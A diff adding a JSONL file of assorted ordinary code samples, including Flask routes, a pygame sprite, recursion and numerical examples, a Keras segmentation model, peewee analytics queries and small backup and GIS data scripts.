diff --git "a/290.jsonl" "b/290.jsonl" new file mode 100644--- /dev/null +++ "b/290.jsonl" @@ -0,0 +1,778 @@ +{"seq_id":"645271213","text":"from flask import render_template, flash, redirect, url_for\nfrom fridgetime import app\nfrom fridgetime.forms import RegistrationForm, LoginForm\nfrom fridgetime.models import User, Recipe, Ingredient\n\n\ntestdata = [\n {\n 'user': 'Grant Donoghue',\n 'recipename': 'Omelette',\n 'ingredients': '3 Eggs'\n }\n]\n\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n return render_template('index.html', testdata=testdata)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n form = RegistrationForm() # passed from forms.py\n if form.validate_on_submit():\n flash(f'Account created for {form.username.data}!', 'success')\n return redirect(url_for('index'))\n return render_template('register.html', title='Register', form=form) # passed from form variable\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n flash(f'You have been logged in!', 'success')\n return redirect(url_for('index'))\n else:\n flash(f'Login unsuccessful. Please check username and password.', 'danger')\n return render_template('login.html', title='Login', form=form)\n","sub_path":"fridgetime/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"427696357","text":"import pygame\nfrom audio import SoundEffects\nfrom graphics import AnimatedSprite\n\n\nclass Player(AnimatedSprite):\n\n def __init__(self, x, y, spritesheet):\n AnimatedSprite.__init__(self, spritesheet)\n self._vertical_speed = 0\n self._horizontal_speed = 0\n self._collidable_stuff = []\n\n self._sounds = SoundEffects()\n\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n def set_collidabel_stuff(self, collidable_stuff):\n self._collidable_stuff = collidable_stuff\n\n def update_horizontal_velocity(self, x):\n if self._horizontal_speed + x < 10\\\n or self._horizontal_speed + x > -10:\n self._horizontal_speed += x\n self.should_flip_horizontally = (self._horizontal_speed > 0)\n\n def update(self, t):\n AnimatedSprite.update(self, t)\n self.rect.y += self._vertical_speed\n if self._vertical_speed < 10:\n self._vertical_speed += 1\n collision_list = pygame.sprite.spritecollide(self, self._collidable_stuff, False)\n for collision in collision_list:\n if self._vertical_speed > 0:\n self.rect.bottom = collision.rect.top\n self._vertical_speed = 0\n else:\n self.rect.top = collision.rect.bottom\n self._vertical_speed = 0\n\n self.rect.x += self._horizontal_speed\n collision_list = pygame.sprite.spritecollide(self, self._collidable_stuff, False)\n for collision in collision_list:\n if self._horizontal_speed > 0:\n self.rect.right = collision.rect.left\n self._horizontal_speed = 0\n else:\n self.rect.left = collision.rect.right\n self._horizontal_speed = 0\n\n def jump(self):\n self.rect.y += 2\n platform_hit_list = pygame.sprite.spritecollide(self, self._collidable_stuff, False)\n self.rect.y -= 2\n if len(platform_hit_list) > 0:\n self._vertical_speed = -20\n self._sounds.jump()\n\n","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"116957517","text":"def make_handler_closure():\n # локальная переменная\n sequence = 0\n\n def handler(result):\n # нелокальная переменная (не затеняет переменную из функции\n # make_handler), а следовательно остается между вызовами handler()\n nonlocal sequence\n sequence += 1\n print(str.format('[~] Got {} result: {}', sequence, result))\n\n return handler\n\n\ndef make_handler_generator():\n sequence = 0\n\n while True:\n # получаем результат с внешнего кода и связываем с переменной result\n result = yield\n sequence += 1\n print(str.format('[~] Got {} result: {}', sequence, result))\n\n\ndef main():\n print('-' * 80)\n # получаем объект функцию\n handler_closure = make_handler_closure()\n\n for r in range(1, 10):\n handler_closure(r)\n\n print('-' * 80)\n # создаем объект генератор\n handler_generator = make_handler_generator()\n\n # двигаемся в т��ле функции генератора до первой инструкции yield\n next(handler_generator)\n\n # итерируем объект генератор\n for r in range(1, 10):\n handler_generator.send(r)\n\n print('-' * 80)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"core/builtin_types/callable_types/functions/closure2.py","file_name":"closure2.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"345607409","text":"def is_prime(x):\n if x==1:\n return False\n if x==3 or x==2:\n return True \n if not x % 2:\n return False\n if (not x%6==1) and (not x%6==5):\n return False\n ub = int(x**.5)\n f = 5\n while f <= ub:\n if not x % f:\n return False\n elif not x % (f+2):\n return False\n f += 6\n return True\n\nprimes = []\nfor i in range(100000, 200000): ## list of primes\n if is_prime(i):\n primes.append(i) \n\ndef rep_count(prime, key):\n count = 0\n for i in range(0, 10):\n rep = int(str(prime).replace(key, str(i)))\n if is_prime(rep) and len(str(rep))==len(str(prime)):\n count = count + 1\n return count\n\nfrom collections import Counter\ni = 0\nflag = True\nwhile flag and i < len(primes):\n prime = primes[i]\n cc = Counter([x for x in str(prime)])\n values = [x>1 for x in cc.values()]\n keys = [key for key, value in zip(cc.keys(), values) if value and key<='2']\n for key in keys:\n if(rep_count(prime, key)==8):\n flag=False\n i = i+1\n\n\n\n","sub_path":"python/Q51.py","file_name":"Q51.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"537422930","text":"# -*- mode:python; coding:utf-8 -*-\n\n# Copyright (c) 2020 IBM Corp. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Trestle Assemble Command.\"\"\"\n\nimport argparse\nimport logging\nfrom pathlib import Path\nfrom typing import Type, TypeVar\n\nfrom ilcli import Command # type: ignore\n\nfrom trestle.core import const\nfrom trestle.core.models.actions import CreatePathAction, WriteFileAction\nfrom trestle.core.models.elements import Element\nfrom trestle.core.models.file_content_type import FileContentType\nfrom trestle.core.models.plans import Plan\nfrom trestle.oscal import assessment_plan\nfrom trestle.oscal import assessment_results\nfrom trestle.oscal import catalog\nfrom trestle.oscal import component\nfrom trestle.oscal import poam\nfrom trestle.oscal import profile\nfrom trestle.oscal import ssp\nfrom trestle.oscal import target\nfrom trestle.utils import fs\nfrom trestle.utils import log\nfrom trestle.utils.load_distributed import load_distributed\n\nlogger = logging.getLogger(__name__)\n\nTLO = TypeVar(\n    'TLO',\n    assessment_plan.AssessmentPlan,\n    assessment_results.AssessmentResults,\n    catalog.Catalog,\n    component.ComponentDefinition,\n    poam.PlanOfActionAndMilestones,\n    profile.Profile,\n    ssp.SystemSecurityPlan,\n    target.TargetDefinition\n)\n\n\nclass CatalogCmd(Command):\n    \"\"\"Assemble a catalog.\"\"\"\n\n    name = 'catalog'\n\n    def _run(self, args: argparse.Namespace) -> int:\n        \"\"\"Assemble a catalog.\"\"\"\n        logger.info(f'Assembling catalog titled: {args.name}')\n        return AssembleCmd.assemble_model(self.name, catalog.Catalog, args)\n\n\nclass ProfileCmd(Command):\n    \"\"\"Assemble a profile.\"\"\"\n\n    name = 'profile'\n\n    def _run(self, args: argparse.Namespace) -> int:\n        logger.info(f'Assembling profile titled: {args.name}')\n        return AssembleCmd.assemble_model(self.name, profile.Profile, args)\n\n\nclass TargetDefinitionCmd(Command):\n    \"\"\"Assemble a target definition.\"\"\"\n\n    name = 'target-definition'\n\n    def _run(self, args: argparse.Namespace) -> int:\n        return AssembleCmd.assemble_model(self.name, target.TargetDefinition, args)\n\n\nclass ComponentDefinitionCmd(Command):\n    \"\"\"Assemble a component definition.\"\"\"\n\n    name = 'component-definition'\n\n    def _run(self, args: argparse.Namespace) -> int:\n        return AssembleCmd.assemble_model(self.name, component.ComponentDefinition, args)\n\n\nclass SystemSecurityPlanCmd(Command):\n    \"\"\"Assemble a system security plan.\"\"\"\n\n    name = 'system-security-plan'\n\n    def _run(self, args: argparse.Namespace) -> int:\n        return AssembleCmd.assemble_model(self.name, ssp.SystemSecurityPlan, args)\n\n\nclass AssessmentPlanCmd(Command):\n    \"\"\"Assemble an assessment plan.\"\"\"\n\n    name = 'assessment-plan'\n\n    def _run(self, args: argparse.Namespace) -> int:\n        return AssembleCmd.assemble_model(self.name, assessment_plan.AssessmentPlan, args)\n\n\nclass AssessmentResultCmd(Command):\n    \"\"\"Assemble an assessment result.\"\"\"\n\n    name = 'assessment-results'\n\n    def _run(self, args: argparse.Namespace) -> int:\n        return AssembleCmd.assemble_model(self.name, 
assessment_results.AssessmentResults, args)\n\n\nclass PlanOfActionAndMilestonesCmd(Command):\n    \"\"\"Assemble a plan of action and milestones.\"\"\"\n\n    name = 'plan-of-action-and-milestones'\n\n    def _run(self, args: argparse.Namespace) -> int:\n        return AssembleCmd.assemble_model(self.name, poam.PlanOfActionAndMilestones, args)\n\n\nclass AssembleCmd(Command):\n    \"\"\"Assemble all subcomponents from a specified trestle model into a single JSON/YAML file under dist.\"\"\"\n\n    name = 'assemble'\n\n    subcommands = [\n        CatalogCmd,\n        ProfileCmd,\n        TargetDefinitionCmd,\n        ComponentDefinitionCmd,\n        SystemSecurityPlanCmd,\n        AssessmentPlanCmd,\n        AssessmentResultCmd,\n        PlanOfActionAndMilestonesCmd\n    ]\n\n    def _init_arguments(self) -> None:\n        self.add_argument('-n', '--name', help='Name of the model to assemble.', required=True)\n        self.add_argument(\n            '-x', '--extension', help='Type of file output.', choices=['json', 'yaml', 'yml'], default='json'\n        )\n\n    @classmethod\n    def assemble_model(cls, model_alias: str, object_type: Type[TLO], args: argparse.Namespace) -> int:\n        \"\"\"Assemble a top level OSCAL model within the trestle dist directory.\"\"\"\n        log.set_log_level_from_args(args)\n        trestle_root = fs.get_trestle_project_root(Path.cwd())\n        if not trestle_root:\n            logger.error(f'Current working directory {Path.cwd()} is not within a trestle project.')\n            return 1\n        if not trestle_root == Path.cwd():\n            logger.error(f'Current working directory {Path.cwd()} is not the top level trestle project directory.')\n            return 1\n\n        # construct the path to the model file name\n        root_model_dir = Path.cwd() / f'{model_alias}s'\n        try:\n            model_file_type = fs.get_contextual_file_type(root_model_dir / args.name)\n        except Exception as e:\n            logger.error('No files found in the specified model directory.')\n            logger.debug(e)\n            return 1\n\n        model_file_name = f'{model_alias}{FileContentType.to_file_extension(model_file_type)}'\n        root_model_filepath = root_model_dir / args.name / model_file_name\n\n        if not root_model_filepath.exists():\n            logger.error(f'No top level model file at {root_model_dir}')\n            return 1\n\n        # distributed load\n        _, _, assembled_model = load_distributed(root_model_filepath)\n        assembled_model_filepath = trestle_root / const.TRESTLE_DIST_DIR / f'{model_alias}.{args.extension}'\n\n        plan = Plan()\n        plan.add_action(CreatePathAction(assembled_model_filepath, True))\n        plan.add_action(\n            WriteFileAction(\n                assembled_model_filepath,\n                Element(assembled_model),\n                FileContentType.to_content_type(f'.{args.extension}')\n            )\n        )\n\n        try:\n            plan.simulate()\n            plan.execute()\n            return 0\n        except Exception as e:\n            logger.error('Unknown error executing trestle create operations. Rolling back.')\n            logger.debug(e)\n            return 1\n","sub_path":"trestle/core/commands/assemble.py","file_name":"assemble.py","file_ext":"py","file_size_in_byte":6736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"171816112","text":"def TOH(n, a, b, c):\r\n    if n == 1:\r\n        print('move 1st disk from ', a, \"to \", c)\r\n        return\r\n    TOH(n - 1, a, c, b)\r\n    print('move ', n, 'th disk from ', a, ' to', c)\r\n    TOH(n - 1, b, a, c)\r\n\r\n\r\nn = int(input())\r\nTOH(n, 'a', 'b', 'c')\r\n","sub_path":"2. Recursion2/6. tower of hanoi.py","file_name":"6. 
tower of hanoi.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"638814293","text":"from pylab import *\nimport mpl_toolkits.mplot3d.axes3d as p3\n\n\nNx = 25 \nNy = 25 \nradius = 0.35\nNiter = 1500 \nerrors = np.zeros(Niter)\n\n\nx = np.linspace(-0.5,0.5,25) \ny = np.linspace(0.5,-0.5,25) \nX,Y = meshgrid(x,y) \nphi = np.zeros((Nx,Ny)) \nii = where(X*X + Y*Y <= radius*radius) \nphi[ii] = 1.0 \n\ncontour(X,Y,phi)\nplot(x[ii[0]],y[ii[1]],'ro')\ngrid()\ntitle('Contour plot of initial potential')\nxlabel('x')\nylabel('y')\nshow()\n\nnewphi = np.zeros((Nx,Ny)) \nfor k in range(Niter):\n oldphi = phi.copy() \n newphi[1:-1,1:-1] = 0.25*(phi[1:-1,0:-2] + phi[1:-1,2:] + phi[0:-2,1:-1] + phi[2:,1:-1]) \n \n newphi[1:-1,0] = newphi[1:-1,1] \n newphi[1:-1,Nx-1] = newphi[1:-1,Nx-2]\n newphi[0,1:-1] = newphi[1,1:-1]\n newphi[ii] = 1.0\n \n errors[k] = max(np.absolute(np.subtract(oldphi.flatten(),newphi.flatten()))) \n phi = newphi.copy() \n\n\n\nxError = np.linspace(1,Niter,1500) \nyError = np.log(errors) \nA=np.zeros((Niter,2)) \nA[:,0] = 1\nA[:,1] = xError\nconst = lstsq(A,yError)[0] \nyError = const[0] + const[1]*xError \nyError = np.exp(yError)\n\nsemilogy(xError,errors)\nshow()\n\nloglog(np.arange(1,1501,50),errors[0::50],'ro')\nloglog(xError,errors)\nshow()\n\nxError2 = np.linspace(501,Niter,1000)\nyError2 = np.log(errors[500:])\nB=np.zeros((Niter-500,2))\nB[:,0] = 1\nB[:,1] = xError2\nconst = lstsq(B,yError2)[0]\nyError2 = const[0] + const[1]*xError2\nyError2 = np.exp(yError2)\n\n\nsemilogy(np.arange(1,1501,50),errors[0::50],'ro')\nplot(xError,yError)\nplot(xError2, yError2)\ngrid()\ntitle('Error plot')\nxlabel('No. of iterations')\nylabel('Error')\nlegend(('Calculated Error','Fit 1 (all iterations)','Fit 2 (>500 iterations)'))\nshow()\n\n\n\n\nfig1 = figure(4)\nax = p3.Axes3D(fig1)\ntitle('The 3-D surface plot of the potential')\nax.set_xlabel('x')\nax.set_ylabel('y')\nax.set_zlabel('Potential $(\\phi)$')\nsurf = ax.plot_surface(X, Y, phi, rstride=1, cstride=1, cmap=cm.jet,linewidth=0, antialiased=False)\nshow()\n\n\ncontour(x,y,phi)\nplot(x[ii[0]],y[ii[1]],'ro')\nxlabel('x')\nylabel('y')\ntitle('Contour plot of final potential')\ngrid()\nshow()\n\n\n\nJx = np.zeros((Nx,Ny))\nJy = np.zeros((Nx,Ny))\n\nJy[1:-1,1:-1] = 0.5*(phi[1:-1,2:] - phi[1:-1,0:-2])\nJx[1:-1,1:-1] = 0.5*(phi[2:,1:-1] - phi[0:-2,1:-1])\n\n\n\n\nplot(x[ii[0]],y[ii[1]],'ro')\nxlabel('x')\nylabel('y')\ntitle('Vector plot of the current flow')\nquiver(y,x,Jy[::-1,:],Jx[::-1,:])\ncontour(x,y,phi)\nshow()\n\n","sub_path":"Assign_5/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"518588118","text":"\n\nfrom xai.brain.wordbase.adjectives._fast import _FAST\n\n#calss header\nclass _FASTED(_FAST, ):\n\tdef __init__(self,): \n\t\t_FAST.__init__(self)\n\t\tself.name = \"FASTED\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"fast\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_fasted.py","file_name":"_fasted.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"486401492","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nfrom collections import OrderedDict\n\nimport peewee\n\nfrom ..pageview.models import PageView, UserAgent\nfrom ..db import database\n\n\nclass 
AnalyticsQuery(object):\n\n @staticmethod\n def all_views():\n return PageView.select()\n\n @staticmethod\n def views_in_interval(beginning, end):\n assert isinstance(beginning, datetime.datetime)\n assert isinstance(end, datetime.datetime)\n return PageView.select().where(end >= PageView.timestamp >= beginning)\n\n @classmethod\n def grouped_by(cls, group_by_duration, views):\n groups = {\n 'month': cls.monthly_views,\n 'week': cls.weekly_views,\n 'day': cls.daily_views\n }\n assert (group_by_duration in groups.keys())\n return groups[group_by_duration](views)\n\n @staticmethod\n def views_count(views):\n return views.count()\n\n @staticmethod\n def daily_views(views):\n query = (\n views.select(PageView.timestamp, peewee.fn.Count(PageView.id))\n .group_by(database.truncate_date('day', PageView.timestamp))\n .order_by(PageView.timestamp.year, PageView.timestamp.month,\n PageView.timestamp.day)\n .tuples())\n return OrderedDict([(obj.date().strftime('%Y-%m-%d'), count) for (obj,count) in query])\n\n @staticmethod\n def monthly_views(views):\n query = (\n views.select(PageView.timestamp, peewee.fn.Count(PageView.id))\n .group_by(database.truncate_date('month', PageView.timestamp))\n .order_by(PageView.timestamp.year, PageView.timestamp.month)\n .tuples())\n return OrderedDict([(obj.date().strftime('%B-%Y'), count) for (obj,count) in query])\n\n @staticmethod\n def weekly_views(views):\n query = (\n views.select(PageView.timestamp, peewee.fn.Count(PageView.id))\n .group_by(PageView.timestamp.year,\n peewee.fn.strftime('%W', PageView.timestamp))\n .order_by(PageView.timestamp.year, PageView.timestamp.month)\n .tuples())\n return OrderedDict([(obj.date().strftime('%Y-%m-%d'), count) for (obj,count) in query])\n\n @staticmethod\n def total_ips(views):\n return views.select(PageView.ip).group_by(PageView.ip).count()\n\n @staticmethod\n def top_n_pages(views, n):\n query = (views.select(PageView.url, peewee.fn.Count(PageView.id))\n .group_by(PageView.url)\n .order_by(peewee.fn.Count(PageView.id).desc())\n .tuples())[:n]\n return [{'url': url, 'hits': hits} for (url, hits) in query]\n\n @staticmethod\n def top_n_countries(views, n):\n query = (views.select(PageView.country, peewee.fn.Count(PageView.id))\n .where(PageView.country!=None)\n .group_by(PageView.country)\n .order_by(peewee.fn.Count(PageView.id).desc())\n .tuples())[:n]\n return [{'country': country, 'hits': hits} for (country, hits) in query]\n\n @staticmethod\n def top_n_browsers(views, n):\n query = (views.select(UserAgent.browser, peewee.fn.Count(PageView.id))\n .where(UserAgent.browser!=None)\n .join(UserAgent, peewee.JOIN.LEFT_OUTER)\n .group_by(UserAgent.browser)\n .order_by(peewee.fn.Count(PageView.id).desc())\n .tuples())[:n]\n return [{'browser': browser, 'hits': hits} for (browser, hits) in query]\n\n @staticmethod\n def top_n_os(views, n):\n query = (views.select(UserAgent.os, peewee.fn.Count(PageView.id))\n .where(UserAgent.os!=None)\n .join(UserAgent, peewee.JOIN.LEFT_OUTER)\n .group_by(UserAgent.os)\n .order_by(peewee.fn.Count(PageView.id).desc())\n .tuples())[:n]\n return [{'os': os, 'hits': hits} for (os, hits) in query]\n\n @staticmethod\n def all_pages(views):\n query = (views.select(PageView.url, peewee.fn.Count(PageView.id))\n .group_by(PageView.url)\n .order_by(peewee.fn.Count(PageView.id).desc())\n .tuples())\n return [{'url': url, 'hits': hits} for (url, hits) in query]\n\n @staticmethod\n def all_countries(views):\n query = (views.select(PageView.country, peewee.fn.Count(PageView.id))\n 
.where(PageView.country!=None)\n                 .group_by(PageView.country)\n                 .order_by(peewee.fn.Count(PageView.id).desc())\n                 .tuples())\n        return [{'country': country, 'hits': hits} for (country, hits) in query]\n","sub_path":"webby/dashboard/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"520921050","text":"from collections import deque\nimport time\nfrom datetime import datetime\n\nprint(\"\\n1st example: simple use of a deque to manage a circular queue\\n\")\n\ncircQueue = deque(maxlen=4)\ns = ''\n\nwhile True:\n    if s.upper() == 'Q':\n        break\n    currTime = datetime.utcnow().strftime('%H:%M:%S')\n    circQueue.append(currTime)\n    print(circQueue) \n    s = input('q to quit: ')\n\nprint(\"\\n2nd example: the deque holds integers whose moving average we compute\\n\")\n\ncircQueue = deque(maxlen=4)\ns = ''\ni = 0\n\nwhile True:\n    if s.upper() == 'Q':\n        break\n    circQueue.append(i)\n    i += 1\n    print(circQueue, end=' ')\n    print('sum:' , end=' ')\n    print(sum(circQueue), end=' ')\n    print('moving avg:' , end=' ')\n    print(sum(circQueue) / 4)\n    s = input('q to quit: ')\n\nprint(\"\\n3rd example, closer to what C2 needs. Here we append to the deque pairs\")\nprint(\"of (volume, price) values stored together in a list. We compute\")\nprint(\"the moving average of the price weighted by volume\\n\")\n\ncircQueue = deque(maxlen=4)\ns = ''\nvolume = 1\nprice = 100\n\nwhile True:\n    if s.upper() == 'Q':\n        break\n    circQueue.append([volume, price])\n    volume += 1\n    price += 10\n    \n    print(circQueue, end=' ')\n    \n    movingVolume = sum(x[0] for x in circQueue)\n    print('mVol:' , end=' ')\n    print(movingVolume, end=' ')\n    \n    movingTotal = sum(x[0] * x[1] for x in circQueue)\n    print('mPrVolTot:' , end=' ')\n    print(movingTotal, end=' ')\n\n    movingAvg = movingTotal / movingVolume\n    print('mPrAvg:' , end=' ')\n    print('{:3.2f}'.format(movingAvg))\n\n    s = input('q to quit: ')","sub_path":"circular_queue_deque.py","file_name":"circular_queue_deque.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"294124154","text":"# %matplotlib inline\nimport numpy as np # for working with arrays - Python has none built in\nimport scipy\nfrom scipy import linalg\n#1\na = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, -1, 12]], float) # create a matrix\nprint(a.shape) # dimensions of the matrix\nb = np.array([[1, 2, 3]], float) # create a vector\n\nb = a * 2 # multiplication by a number - every element is multiplied\nprint(b)\n\nc = a + 1 # adding a number - it is added to every element\nprint(c)\nd = c + b # matrix addition - performed element by element\nd = np.add(b, c)\t\t\t # the same via the NumPy function\n\nd = b - c \t\t\t # matrix subtraction - performed element by element\nd = np.subtract(b, c) # the same via the NumPy function\nprint(d)\n\nf = d.transpose() # transposition\nd.T\nprint(f)\n\ng = np.dot(f, d) # matrix multiplication\nprint(g)\n\ne = np.identity(3) # create an identity matrix of order 3\nprint(e)\n\np = np.linalg.inv(g) # create the inverse matrix\nprint(p)\n\naa = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nnp.linalg.det(aa) # determinant\nnp.linalg.matrix_rank(b, 0.0001) # rank of the matrix\n\n#2 Systems of linear equations\nprint('##########')\nA = np.array([[3, 2], [3, -4]])\nB = np.array([4, 1])\nnp.linalg.solve(A, B) # solve the linear system\n\nP, L, U = linalg.lu(A) # LU decomposition of the system\nprint(P, L, 
U)\n\nA = np.array([[1, 2, -1], [3, -4, 0], [8,-5, 2], [2,0, -5], [11, 4, -7]])\nB = np.array([1, 7, 12, 7, 15])\nX, q, rank, p = np.linalg.lstsq(A, B) # least-squares solution\n\n#!!! Not verified\nL = scipy.linalg.cholesky(A) # Cholesky decomposition - for symmetric matrices\nQ, R = np.linalg.qr(A) # QR decomposition\nnp.concatenate((A, B)) # concatenate matrices\n","sub_path":"operation_08_matrix.py","file_name":"operation_08_matrix.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528917027","text":"#-----------------------------------------\n# import\n#-----------------------------------------\nimport os\nimport sys\nfrom keras.layers import Input, Conv2D, Conv2DTranspose, Add, Activation, MaxPooling2D, Dropout, UpSampling2D\nfrom keras.models import Model\nfrom keras.initializers import Constant\nfrom keras.regularizers import l2\nfrom .layers import BilinearUpSampling2D, bilinear_upsample_weights\nfrom .encorders import build_vgg16\n\n\n#-----------------------------------------\n# defines\n#-----------------------------------------\nCUR_PATH = os.path.join(os.path.dirname(__file__))\n\n#-----------------------------------------\n# functions\n#-----------------------------------------\n\n\ndef build(classes=21, input_shape=(224, 224, 3), weights_path=None, weight_decay=0., drop_rate=None, bilinear=False):\n\n    # Build Base Encorder\n    encorder = build_vgg16(input_shape, weights_path,\n                           weight_decay, drop_rate)\n\n    encorder_input = encorder.inputs[0]\n    # for skip connection\n    p4 = encorder.get_layer(name='block4_pool').output\n    p7 = encorder.outputs[0]\n\n    '''\n    Skip Connection\n    '''\n    # dimention reduction\n    p4 = Conv2D(classes, 1, activation='relu', name='conv_p4',\n                kernel_regularizer=l2(weight_decay),\n                kernel_initializer='he_normal')(p4)\n    p7 = Conv2D(classes, 1, activation='relu', name='conv_p7',\n                kernel_regularizer=l2(weight_decay),\n                kernel_initializer='he_normal')(p7)\n\n    # upsampling x2\n    u4 = Conv2DTranspose(classes, 4, activation='relu',\n                         strides=2, padding='same', name='upscore_p4',\n                         kernel_regularizer=l2(weight_decay),\n                         #kernel_initializer=Constant(bilinear_upsample_weights(2, classes)),\n                         kernel_initializer='he_normal')(p4)\n\n    # upsampling x4\n    u7 = Conv2DTranspose(classes, 8, activation='relu',\n                         strides=4, padding='same', name='upscore_p7',\n                         kernel_regularizer=l2(weight_decay),\n                         #kernel_initializer=Constant(bilinear_upsample_weights(4, classes)),\n                         kernel_initializer='he_normal')(p7)\n\n    # fuse skip layers\n    x = Add(name='add')([u4, u7])\n\n    # upsampling x8\n    if bilinear:\n        x = BilinearUpSampling2D((8, 8))(x)\n    else:\n        x = Conv2DTranspose(classes, 16, activation='relu',\n                            strides=8, padding='same', name='upscore_final',\n                            kernel_regularizer=l2(weight_decay),\n                            #kernel_initializer=Constant(bilinear_upsample_weights(8, classes)),\n                            kernel_initializer='he_normal')(x)\n\n    x = Activation('softmax', name='softmax')(x)\n\n    model = Model(encorder_input, x)\n\n    return model\n","sub_path":"models/vgg_fcn16s.py","file_name":"vgg_fcn16s.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405252921","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n\n@app.route('/report')\ndef report():\n    minuscula = False\n    mayuscula = False\n    numero = False\n    first = 
request.args.get('first')\n\n    minuscula = any(c.islower() for c in first) # at least one lowercase letter\n    mayuscula = any(c.isupper() for c in first) # at least one uppercase letter\n    numero = first[-1].isdigit() # a digit at the end\n\n    report = minuscula and mayuscula and numero\n\n    return render_template('report.html', report=report, min=minuscula, may=mayuscula, num=numero)\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"flask_exercise/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"375986390","text":"if __name__ == '__main__':\n    import pandas as pd\n    import os\n    from datetime import datetime\n\n    from settings import Settings\n    from dropbox_sync_uploader import Uploader\n\n    settings = Settings(settings_file=os.path.join(os.path.dirname(__file__), 'settings.yml'))\n    timestamp = datetime.now().strftime(settings.dropbox_sync.timestamp_format)\n    logfile = settings.dropbox_sync.log.file_path\n    \n    uploader = Uploader(settings)\n\n    try:\n        df = pd.read_csv(logfile)\n        for _, row in df.iterrows():\n            remote_file_path = '/backups/{}{}'.format(timestamp, row['filepath'])\n            if row['event'] != 'DELETED':\n                uploader.upload(row['filepath'], remote_file_path)\n            else:\n                uploader.delete(remote_file_path)\n    except Exception:\n        pass\n","sub_path":"dropbox_sync_sender.py","file_name":"dropbox_sync_sender.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293669622","text":"import arcpy, os, sys\n\n# GetParameterAsText returns a single string, so assign it once and reuse it\ninWorkspace = arcpy.GetParameterAsText(0)\narcpy.env.workspace = inWorkspace\noutWorkspace = arcpy.GetParameterAsText(1)\n\n# set paths to ones specified by user\nrootPath=inWorkspace\noutPath = outWorkspace\n# folders under root\ndataPath = rootPath + \"\\\\Data\"\npopPath = rootPath + \"\\\\Pop_data_districts\"\n#output path\noutput = \"\\\\output\"\n\n# define lstfiles\nlstfiles = arcpy.ListFiles(\"*.xls\")\nsheet = \"Tab Wbl \"\n\nfor xlsfile in lstfiles:\n\tfor num in range(1,24):\n\t\ttmp = \"\"\n\t\tif num < 10:\n\t\t\ttmp += \"0\" + str(num)\n\t\telse: \n\t\t\ttmp += str(num)\n\t\ttry:\n\t\t\tarcpy.TableToTable_conversion(xlsfile + \"\\\\\" + sheet + tmp + \"$\", outPath, \"test\" + tmp + \".dbf\")\n\t\texcept RuntimeError as i:\n\t\t\tcontinue\n\n# lets merge them all together!\narcpy.env.workspace += output\ntableList = arcpy.ListTables()\narcpy.Merge_management(tableList, \"all.dbf\")\narcpy.AddMessage(\"success\")\n","sub_path":"tools/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531277231","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nsin1 = np.zeros((50,100))\nsin2 = np.zeros((50,100))\nsin3 = np.zeros((50,100))\nsin4 = np.zeros((50,100))\n\nfor i in range(50):\n    for j in range(100):\n    \n        sin1[i,j] = np.cos((i - 25.)*np.pi/50.) * np.cos((j - 12.5)*np.pi/25.)\n        sin2[i,j] = np.cos((i - 25.)*np.pi/50.) * 